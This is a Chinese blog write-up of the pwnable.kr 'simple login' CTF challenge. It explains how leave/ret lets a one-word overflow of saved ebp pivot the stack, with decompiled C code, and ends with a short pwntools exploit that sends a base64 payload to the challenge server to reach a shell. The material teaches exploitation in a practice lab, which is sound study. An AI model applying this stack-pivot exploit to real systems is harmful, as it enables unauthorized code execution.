pwnable(simple login)leave和ret的深入研究

最新推荐文章于 2023-05-15 10:19:38 发布
最新推荐文章于 2023-05-15 10:19:38 发布
阅读量587 收藏 2
点赞数 1
分类专栏: 溢出攻击 漏洞利用技巧 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/82908422
版权

通常栈溢出获取shell的方法是覆盖返回地址,但是如果溢出只允许覆盖到ebp该怎么办呢?

Leave的作用相当==mov esp,ebp和pop ebp
Win32汇编中局部变量的使用方法可以解释一个很有趣的现象:在DOS汇编的时候,如果在子程序中的push指令和pop指令不配对,那么返回的时候ret指令从堆栈里得到的肯定是错误的返回地址,程序也就死掉了。但在Win32汇编中,push指令和pop指令不配对可能在逻辑上产生错误,却不会影响子程序正常返回,原因就是在返回的时候esp不是靠相同数量的push和pop指令来保持一致的,而是靠leave指令从保存在ebp中的原始值中取回来的,也就是说,即使把esp改得一塌糊涂也不会影响到子程序的返回,当然,“窍门”就在ebp,把ebp改掉,程序就玩完了。

mov esp, ebp  ;esp的内容为ebp指向的栈地址
pop ebp       ;ebp = ebp指向的栈地址中保存的值,esp + 4

pop eip       ;程序转到 esp + 4 指向的地址执行

看一下程序

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+18h] [ebp-28h]
  char s; // [esp+1Eh] [ebp-22h]
  unsigned int v6; // [esp+3Ch] [ebp-4h]

  memset(&s, 0, 0x1Eu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  printf("Authenticate : ");
  _isoc99_scanf("%30s", &s);
  memset(&input, 0, 0xCu);
  v4 = 0;
  v6 = Base64Decode(&s, &v4);
  if ( v6 > 0xC )
  {
    puts("Wrong Length");
  }
  else
  {
    memcpy(&input, v4, v6);
    if ( auth(v6) == 1 )
      correct();
  }
  return 0;
}

_isoc99_scanf("%30s", &s);输入限制30个字节。
对输入进行了base64解密。
解密后的数据要小于等于12

_BOOL4 __cdecl auth(int a1)
{
  char v2; // [esp+14h] [ebp-14h]
  char *s2; // [esp+1Ch] [ebp-Ch]
  int v4; // [esp+20h] [ebp-8h]

  memcpy(&v4, &input, a1);
  s2 = (char *)calc_md5(&v2, 12);
  printf("hash : %s\n", (char)s2);
  return strcmp("f87cd601aa7fedca99018a8be88eda34", s2) == 0;
}

这里进行了拷贝,可以看到int v4; // [esp+20h] [ebp-8h]但是实际上能拷贝的数据长度位12字节可以覆盖ebp。

.text:0804930B                 leave
.text:0804930C                 retn

当auth正常返回的时候设置mov esp ebp(这个时候ebp还是原来的正确值),pop ebp在我们可以设置ebp。pop eip不会影响。
程序继续向后运行…
运行到下一个
leave;ret这个时候会
mov esp ebp设置esp(这里会把esp设置为刚才ebp的值也就是我们可以控制的内容)
pop ebp 不会有影响。
ret(也就是pop ip 也就是程序的执行流跳转到 esp+4的地址处执行)这个时候会劫持程序的执行流。

exp很简单

from pwn import *
p=remote("pwnable.kr",9003)
shell=0x08049284
INput=0x0811EB40
payload=(p32(0xaaaaaaaa)+p32(shell)+p32(INput)).encode("base64")
p.recvuntil("Authenticate : ")
p.sendline(payload)
p.interactive()
九层台
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.kr之simple login
Jason_ZhouYetao的博客
07-14 581
这题与之前所作的题目不同,不同点在于这题不存在ssh连接至其他的服务器,需要自己在脚本中体现。 首先,下载文件,放到IDA里跑一跑(这里说明,要注意下载下来的文件是32位还是64位的文件,这关系到能不能正确打开并得到反汇编代码的问题),得到main函数的伪代码: int __cdecl main(int argc, const char **argv, const char **envp) ...
Pwnable.kr simple login
BengDouLove的博客
03-18 276
程序的逻辑是,首先输入s,最大三十个字节(这里没有溢出),然后base64解密,解密后的明文存在v4,长度存在v6, 后面判断v6不能大于12,判断成功后将v4复制到input变量,,之后进入auth函数 inout auth函数第一句的memcpy感觉就很突兀,把input复制给v4(这是autn里的v4),后面根本没有用到v4,从这个角度看这句话应该也有点问题,,, 因为前面判断了,所以inp...
leave指令和ret指令的解释
06-20
介绍了leave和ret汇编指令在使用中的难点
pwnable_simple_login
z1r0的博客
03-25 442
pwnable_simple_login 查看保护 上面图片可以看到有个溢出,一直溢出到了ebp。也就是说我们可以控制ebp,那如何控制ret_addr呢? 其实我们可以伪造一个假的内存块的地址,这个地址里里面放一个伪造的ebp和返回地址及参数,让程序认为伪造了一个正确的ret_addr。 from pwn import * import base64 context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0'
pwnable simple login
weixin_30542079的博客
11-08 100
这是一周前做的一道题目,总的来说这道题很简单,当然一开始看了半天没发现溢出点也是十分的惭愧,题目出的很良心,思路就是溢出之后我们可以控制main函数的ebp, 进而在main函数返回时进行漏洞利用。 先看看IDA反汇编的结果 主函数的几个内存操作的函数都没有什么问题,那么问题很可能出现在auth函数了 这时候溢出点就一目了然了,input最大12个字节,而v4只有8个字节,调试一下发...
pwnable.kr [Rookiss] - [simple login]
Re:Umiade.tr
03-23 1344
Can you get authentication from this server? Download : http://pwnable.kr/bin/login Running at : nc pwnable.kr 9003 Rookiss 初体验就从相对熟悉的逆向这一块开始好了。下载好文件后发现是 elf 64 ,在虚拟机上简单跑一跑,要求输入一个 Authenticat
C语言头文件 RETCODE
06-13
C语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言...RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RET
RETAS_HD_PRO.zip
06-29
PRO 是日本 Celsys 株式会社开发的一套应用于普通PC和苹果机的专业二维动画制作系统,全称为 Revolutionary Engineering Total Animation System,它替代了传统动画制作中描线、上色、制作摄影表、特效处理、拍摄...
开发板系列STM32F103RET6-电路方案
04-19
板载资源: 3.3 / 5.0 / 12V电源输入/输出引脚 重置输入/输出引脚(可切换) RTC电源输入 标准数字IO * 8 辅助数字IO * 27(注意:辅助方法可能被重用,而不是首先使用) 模拟量IO * 4 I2C接口* 1 ...
GD32F405RET6 + FreeRTOS + wk2204
07-05
GD32F405RET6 uart0 uart1 uart2 uart3 均为485接口 uart4为232接口 uart5为sbus接口 can0 、can1 均配置完毕 spi0用于驱动W25Q64JVSSIQ(程序中未实现) spi1用于驱动wk2204 wk2204有4路uart,uart1 和 uart3硬件为...
pwnable.kr simple login
you_need_me的博客
06-02 261
点击打开链接
pwnable.kr 之simplelogin
bluestar628的博客
12-09 341
这道题目还是很有意思的。是自从参加了一次pwn培训之后的第一道题目,感觉确实比以前舒服多了。 下载题目,IDA反汇编,基本逻辑很简单,输入一个字符串,进行base64解密,然后比对长度,如果超过12个就直接报错。 漏洞点找了很久,这个漏洞点确实很巧妙。开始的时候,checksec了一下。 发现开启了栈执行保护,和缓冲区溢出保护。所以直接放弃了栈溢出这个思路,
pwn -- pwnable.kr -- simple-login---学习stack pivot
YANG12345_6的博客
12-24 278
在看关于pwn的书时学到了 栈帧劫持stack pivot 利用这个例题练习一下。 基本思想: stack pivot利用到的gadget是在函数退出时需要的两条指令:leave(mov esp,ebp;pop ebp);ret;。这两条指令基本都会有。 可以利用这两条指令,通过栈溢出的方式,实现可以完全控制栈。 stack pivot实现的基本方法 (我的理解 通过栈溢出的方式将 我们之后要实现的完全可控的栈的地址写到EBP的地方 写入之后 ,程序第一次leave;ret;,将写入的地址赋给esp。
pwnable.kr之simple login详解
Bill
04-26 2093
学习二进制不容易,大家要忍得住寂寞,耐得住孤独,进入正题. 总体思路: 输入更多的数据,溢出,修改main的返回值地址,使其返回到correct中,从而获取shell. 大家可能会有疑问:为什么不修改auth函数的返回值地址,跳到correct中.这是因为长度不够,我们需要输入16个字节的长度,才能覆盖返回值地址,但是程序只给了我们12个字节的长度. main函数int main(int
栈迁移(leave ret)(更适合pwn宝宝体质的栈迁移~)
Kata_Jhin的博客
05-15 1589
更适合pwn入门新手体质的栈迁移教程
Push, Pop, call, leave 和 Ret 指令图解
C++实习生
07-10 3828
指令图解:最近在研究如何在程序crash定位出错函数,补充的计算机系统基础知识。此篇主要是介绍IA32中重要的几个汇编指令(以AT&T为例),详情请参考《深入计算机系统2》第三章第三节。PUSH 和 POP指令的汇编格式:PUSH SRC ;POP DST指令的基本功能:PUSH指令在程序中常用来暂存某些数据,而POP指令又可将这些数据恢复。PUSH 等价于:subl $4, %espmo......
leave, ret, enter指令的等效
fa1c4的blog
02-07 1235
leave, ret, enter指令可以看做复合指令 ; push eip 进入前会压栈返回地址 Sub PROC enter 8,0 . . . leave ret Sub ENDP 等效 ; push eip 进入前会压栈返回地址 Sub PROC push ebp mov ebp, esp sub esp, 8 ; enter . . . mov esp, ebp pop ebp
【Pwn】SWPUCTF_2019_login
Nothing
12-09 1152
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
PWN入门之栈溢出之ret2dlresolve
weixin_44681716的博客
05-03 999
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
retc和bwsoil计算机程序拟合
最新发布
08-05
retc和bwsoil都是计算机程序,用于拟合数据。拟合是指根据已知的数据点,通过拟合曲线或者函数来求得未知数据的值。 retc是一个用于土壤水分渗透计算的计算机程序。它基于Richard方程,结合土壤水分属性和温度条件,可以估计土壤中水分的流动速率。retc通过拟合已知的土壤水分数据,找到最佳的拟合曲线,从而可以预测未知点的水分动态。它在农业、水资源管理等领域有着广泛的应用。 bwsoil是一个用于土壤水分特性曲线拟合的计算机程序。它通过测量土壤的吸力和相对含水量,可以确定土壤的水分特性曲线。bwsoil根据已知的吸力和含水量的数据点,拟合出最佳的曲线,从而可以通过曲线上的其他点来估计土壤中水分的水力特征。它在土壤物理学和农业科学中被广泛运用。 这两个程序都利用了统计学中的拟合方法,如最小二乘法,来找到最佳的拟合曲线。它们能够提供有效的土壤水分数据,帮助人们更好地了解土壤水分的分布和变化。同时,拟合程序还可以帮助决策者进行农田灌溉调度和农业管理决策,从而提高农业的生产效率和资源利用效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值